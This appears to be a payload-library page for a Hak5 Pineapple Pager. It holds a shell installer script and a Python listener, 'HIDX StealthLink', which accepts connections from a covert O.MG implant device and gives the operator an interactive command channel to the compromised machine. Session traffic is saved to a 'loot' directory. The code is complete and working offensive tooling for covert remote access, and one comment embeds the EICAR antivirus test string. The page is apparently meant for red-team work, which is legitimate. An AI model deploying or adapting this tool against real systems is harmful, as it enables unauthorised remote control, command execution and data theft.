01-09-2026, 10:56 PM
There are many forms of remote access, which may be used by different actors for various purposes. A red team may use remote access techniques that provide persistent access to an exploited target for the purposes of reconnaissance and lateral movement across the network. A systems administrator may use remote access to perform day-to-day operations on a network-accessible computer. An array of techniques exists to obtain and maintain remote access across a network, including using a command and control server such as Cloud C². Common remote access techniques include reverse shells, and may employ obfuscation techniques to mask the connection. See all remote access payloads. Note: this payload requires a Pineapple Pager.
payload.sh
stealthlink-client-pager.py
payload.sh
Code:
# Packages the Stealthlink client needs on the device.
REQUIRED_PACKAGES=(python3 tmux)

# The package lists only need refreshing once per run, and only when
# something actually has to be installed.
OPKG_UPDATED=0

for pkg in "${REQUIRED_PACKAGES[@]}"; do
    # The trailing space keeps "python3" from matching "python3-foo".
    if opkg list-installed | grep -q "^$pkg "; then
        LOG "$pkg is already installed."
        continue
    fi

    LOG "$pkg is not installed. Prompting user to confirm installation..."
    resp=$(CONFIRMATION_DIALOG "$pkg is required. Install it?")

    # Exit status of the dialog itself: rejected or errored dialogs abort.
    case $? in
        $DUCKYSCRIPT_REJECTED)
            LOG "Dialog rejected"
            exit 1
            ;;
        $DUCKYSCRIPT_ERROR)
            LOG "An error occurred"
            exit 1
            ;;
    esac

    # Captured output of the dialog: the user's actual answer.
    case "$resp" in
        $DUCKYSCRIPT_USER_CONFIRMED)
            LOG "User confirmed $pkg installation. Proceeding..."
            ;;
        $DUCKYSCRIPT_USER_DENIED)
            LOG "User denied $pkg installation. Exiting."
            exit 1
            ;;
        *)
            LOG "Unknown response: $resp. Exiting."
            exit 1
            ;;
    esac

    LOG "Installing $pkg..."
    if [ "$OPKG_UPDATED" -eq 0 ]; then
        # Best effort: a failed refresh is reported, but the install is still
        # attempted with whatever package lists are already cached.
        opkg update || LOG "opkg update failed; trying to install with existing package lists."
        OPKG_UPDATED=1
    fi
    opkg install "$pkg" || {
        ERROR_DIALOG "Failed to install $pkg. Exiting."
        exit 1
    }
    LOG "$pkg installed successfully."
done
# Start the HIDX Stealthlink Client in a named tmux session
SESSION="hidx"

# Reuse an existing session instead of starting a second listener on the same port.
if tmux has-session -t "$SESSION" 2>/dev/null; then
    LOG yellow "Stealthlink client is already running in tmux session '$SESSION'.\n\nTo attach (SSH): tmux a -t $SESSION\nTo stop: kill the tmux session (tmux kill-session -t $SESSION)\n\nLogs are in /root/loot/stealthlink/"
    exit 0
fi

LOG "Starting HIDX Stealthlink Client in tmux session '$SESSION'..."
# The client script is resolved relative to the current working directory.
tmux new-session -d -s "$SESSION" 'python3 ./stealthlink-client-pager.py 0.0.0.0 1234'

# The detached session only exists if tmux managed to create it.
if tmux has-session -t "$SESSION" 2>/dev/null; then
    LOG green "Stealthlink client started!\n\nTo attach (SSH): tmux a -t $SESSION\nTo stop: kill the tmux session (tmux kill-session -t $SESSION)\n\nLogs are in /root/loot/stealthlink/"
else
    ERROR_DIALOG "Failed to start Stealthlink client in tmux session."
    exit 1
fi
stealthlink-client-pager.py
Code:
import os
import sys
import socket
import select
import logging
import binascii
import argparse
import threading
from datetime import datetime
from time import sleep
from pprint import pprint
# X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
## Module-level settings read by handle_client() and console_input().
## These can be set but aren't meant to be changed regularly.
# When True, console_input() prints an empty local prompt instead of "\r$".
remote_prompt = True # Assume that prompt gets received from host - Set to true for Powershell usage
# When True, handle_client() marks the console ready-to-send on every received
# message and console_input() never clears that flag after sending.
nowait = True # wait or not wait for end of message control characters
# When truthy, console_input() sleeps float(delay) seconds after each chunk it sends.
delay = None # delay between messages (0.2-0.5 is fine) default to None
# When True, console_input() pads the outgoing message to a multiple of 64 characters.
windows = False # enable larger buffer, ONLY meant for testing!
def non_blocking_input(prompt="", timeout=5):
    """Show ``prompt`` and wait up to ``timeout`` seconds for a line on stdin.

    Returns the line with surrounding whitespace stripped, or ``None`` when
    nothing became readable before the timeout expired.
    """
    print(prompt, end="", flush=True)
    readable = select.select([sys.stdin], [], [], timeout)[0]
    if not readable:
        return None
    return sys.stdin.readline().strip()
def pad_input(input_str, left_pad=False, right_pad=False, chunk_size=8):
    """Pad ``input_str`` with spaces up to the next multiple of ``chunk_size``.

    Args:
        input_str: Text to pad. ``bytes`` are decoded as UTF-8 before padding.
        left_pad: Put the padding in front of the text.
        right_pad: Put the padding after the text. This is the default when
            neither flag is given.
        chunk_size: Alignment boundary; must be a positive integer.

    Returns:
        The padded text as ``str``. Input whose length is already a multiple
        of ``chunk_size`` (including the empty string) is returned unpadded.

    Raises:
        ValueError: If both ``left_pad`` and ``right_pad`` are requested, or
            if ``chunk_size`` is smaller than 1.
    """
    if left_pad and right_pad:
        raise ValueError("[!]Cannot add padding on both the left and right side!")
    if chunk_size < 1:
        raise ValueError(f"[!]chunk_size must be a positive integer, got {chunk_size!r}")

    # The length is measured on the value as passed in (byte count for bytes
    # input), i.e. before any decoding takes place.
    padding = " " * (-len(input_str) % chunk_size)

    if isinstance(input_str, bytes):
        input_str = input_str.decode("utf-8")

    if left_pad:
        return padding + input_str
    # Right padding is both the explicit and the default behaviour.
    return input_str + padding
def split_output(message, chunk_size=8):
    """Split ``message`` into consecutive pieces of ``chunk_size`` characters.

    Every piece is right-padded with spaces by ``pad_input`` so that all
    returned chunks, including the last one, are ``chunk_size`` long.

    Args:
        message: The text to split.
        chunk_size: Size of each chunk; also used as the padding boundary.

    Returns:
        A list of padded chunks, empty when ``message`` is empty.
    """
    # chunk_size is forwarded so the padding boundary always matches the
    # slice size, not just for the default of 8.
    return [
        pad_input(message[start:start + chunk_size], right_pad=True, chunk_size=chunk_size)
        for start in range(0, len(message), chunk_size)
    ]
def recvlog(msg):
    """Echo ``msg`` to the console and record it in both session logs.

    The message is printed without a trailing newline, written as-is to the
    received-data log, and written with a timestamp and ``[RECV]`` tag to the
    combined log.
    """
    stamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    print(msg, end="")
    logger_received.info(msg)
    combined_line = f"[{stamp}] [RECV] {msg}"
    logger_combined.info(combined_line)
def handle_client(client_socket, run, rts):
    """Receive data from the connected device until the session ends.

    Args:
        client_socket: Connected socket to read from.
        run: ``threading.Event`` that stays set while the session is alive;
            cleared here on a socket error or a disconnect.
        rts: ``threading.Event`` ("ready to send") that is set when the
            console may send the next command.
    """
    while run.is_set():
        try:
            chunk = client_socket.recv(1024)
        except OSError as e:
            run.clear()
            print(f"[!]Socket Exception: {e}")
            break

        # An empty read means the peer closed the connection.
        if not chunk:
            recvlog("[!]Socket has disconnected....")
            try:
                client_socket.shutdown(socket.SHUT_RDWR)
            except OSError:
                # The peer is already gone; shutdown may fail, but the socket
                # still has to be closed and the session stopped.
                pass
            client_socket.close()
            run.clear()
            break

        # Undecodable bytes (binary output, or a multi-byte character split
        # across two reads) are replaced rather than crashing the thread.
        data = chunk.decode("utf-8", errors="replace")

        if "\x07\x17" in data or nowait:
            # End-of-message marker seen, or end-of-message waiting disabled.
            rts.set()
        elif "SH" in data:
            data = data.strip("\n")
            rts.set()

        recvlog(data)
def console_input(client_socket, run, rts, server_socket=None):
    """Read commands from the console and send them to the connected device.

    Each command is terminated with ``"\\n\\x07\\x17\\0"``, optionally padded
    to 64 characters (``windows``), logged to the combined log, and sent in
    8-character chunks. Typing ``%exit`` or anything containing ``%quit``
    ends the session, as does stdin reaching end-of-file.

    Args:
        client_socket: Connected socket to write to.
        run: ``threading.Event`` that stays set while the session is alive.
        rts: ``threading.Event`` that is set when a command may be sent.
        server_socket: Optional listening socket; its timeout is reset to one
            second on quit.
    """
    print("\nHIDX StealthLink Universal Client (type '%quit' to exit)")
    debug_send = False      # developer toggle: send timestamps instead of reading input
    split_messages = True   # send in padded chunks rather than one sendall()

    while run.is_set():
        # Wait for the ready-to-send flag with a timeout instead of spinning,
        # so `run` is still re-checked regularly without burning CPU.
        if not rts.wait(timeout=0.2):
            continue

        if debug_send:
            dt = datetime.now().strftime("%M:%S.%f")
            user_input = f"CLI {dt}"
        else:
            prompt_msg = "" if remote_prompt else "\r$"
            print(prompt_msg, end="", flush=True)
            try:
                user_input = input()
            except EOFError:
                # stdin was closed: no more commands can arrive, so shut down
                # the same way an explicit quit would.
                print("[!]Console input closed, quitting.")
                user_input = "%quit"

        if not user_input:
            continue

        if user_input == "%exit" or "%quit" in user_input:
            if server_socket:
                server_socket.settimeout(1)
            client_socket.close()
            run.clear()
            break

        try:
            payload = user_input + "\n\x07\x17\00"
            if windows:
                payload = pad_input(payload, right_pad=True, chunk_size=64)
            if logger_combined:
                timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
                logger_combined.info(f"[{timestamp}] [SEND] {payload}")

            if split_messages:
                for piece in split_output(payload):
                    client_socket.sendall(piece.encode())
                    if delay:
                        sleep(float(delay))
            else:
                client_socket.sendall(payload.encode())

            if not nowait:
                # Hold further input until the receiver signals readiness.
                rts.clear()
        except OSError as e:
            print(f"[!]Socket Exception: {e}")
            run.clear()
            client_socket.close()
            break
def hidxcli(host, port, reuse=True):
    """Listen on ``host:port`` and run an interactive session per connection.

    For every accepted connection a receiver thread (``handle_client``) and a
    console thread (``console_input``) are started. The accept loop runs
    until the shared ``run`` event is cleared by one of those threads.

    Args:
        host: Address to bind to.
        port: TCP port to listen on.
        reuse: Set ``SO_REUSEADDR`` on the listening socket when True.

    This function does not return: it always ends by exiting the process
    with status 1, after closing the listening socket.
    """
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if reuse:
        server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

    run = threading.Event()
    run.set()
    rts = threading.Event()
    rts.set()

    try:
        server_socket.bind((host, port))
        server_socket.listen(1)
        # Short accept timeout so the loop notices when `run` is cleared.
        server_socket.settimeout(1)
        print(f"[*]Server listening on {host}:{port}")

        while run.is_set():
            try:
                client_socket, addr = server_socket.accept()
            except socket.timeout:
                continue

            recvlog(f"[+]O.MG Device connected from {addr[0]}:{addr[1]}")
            os.system(f"ALERT 'StealthLink: O.MG Device connected from {addr[0]}'")
            rts.set()

            client_thread = threading.Thread(
                target=handle_client, args=(client_socket, run, rts)
            )
            client_thread.start()
            console_thread = threading.Thread(
                target=console_input, args=(client_socket, run, rts, server_socket)
            )
            console_thread.start()
    except OSError as e:
        # Report bind/listen/accept failures; otherwise the exit in `finally`
        # would replace the exception and the cause would never be shown.
        print(f"[!]Listener error: {e}")
    finally:
        print("[?]Attempting to close..")
        os.system("ALERT 'Stealthlink: O.MG Device Disconnected and/or Listener shutting down'")
        try:
            server_socket.shutdown(socket.SHUT_RDWR)
        except OSError:
            # A listening socket that never connected cannot be shut down.
            pass
        server_socket.close()
        # Exit status is kept at 1 on every path, as before.
        sys.exit(1)
if __name__ == "__main__":
    # All four positionals are optional; omitted log paths fall back to
    # timestamped files in the loot directory.
    cli = argparse.ArgumentParser(description="Client")
    cli.add_argument("host", type=str, nargs="?", default="0.0.0.0", help="address to bind to")
    cli.add_argument("port", type=int, nargs="?", default=1234, help="port to listen on")
    cli.add_argument("sendlog", type=str, nargs="?", help="message send log")
    cli.add_argument("recvlog", type=str, nargs="?", help="message receive log (for loot)")
    args = cli.parse_args()

    # Make sure the loot directory for this payload exists.
    loot_dir = "/root/loot/stealthlink"
    os.makedirs(loot_dir, exist_ok=True)

    # One pair of log files per session, named after the start time.
    session_timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
    recvlog_path = args.recvlog or os.path.join(
        loot_dir, f"stealthlink-recv-{session_timestamp}.log"
    )
    combinedlog_path = args.sendlog or os.path.join(
        loot_dir, f"stealthlink-combined-{session_timestamp}.log"
    )

    # Handlers emit the bare message; timestamps are added by the callers.
    message_only = logging.Formatter('%(message)s')

    def _file_logger(name, path):
        """Return the named logger writing INFO-level messages to ``path``."""
        log = logging.getLogger(name)
        handler = logging.FileHandler(path)
        handler.setFormatter(message_only)
        log.addHandler(handler)
        log.setLevel(logging.INFO)
        return log

    # These are module globals used by recvlog() and console_input().
    logger_received = _file_logger("received_data", recvlog_path)
    logger_combined = _file_logger("combined_data", combinedlog_path)

    print("[*] Logs will be saved to:")
    print(f"[*] Received: {recvlog_path}")
    print(f"[*] Combined: {combinedlog_path}")

    hidxcli(args.host, args.port)